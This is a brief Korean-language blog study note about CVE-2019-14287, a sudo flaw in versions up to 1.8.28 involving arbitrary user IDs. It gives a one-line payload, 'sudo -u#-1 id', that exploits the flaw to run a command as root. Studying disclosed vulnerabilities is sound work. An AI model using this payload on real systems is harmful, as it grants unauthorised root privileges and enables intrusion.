HACKING/1-DAY study

CVE-2019-14287

공부하자~~ 2019. 10. 19. 01:50

Description

Sudo 1.8.28 이하 버전에서 발생하는 취약점으로, sudo가 임의의 사용자 ID로 명령을 실행하는 방식에서 결함이 발생함.

payload

$ sudo -u#-1 id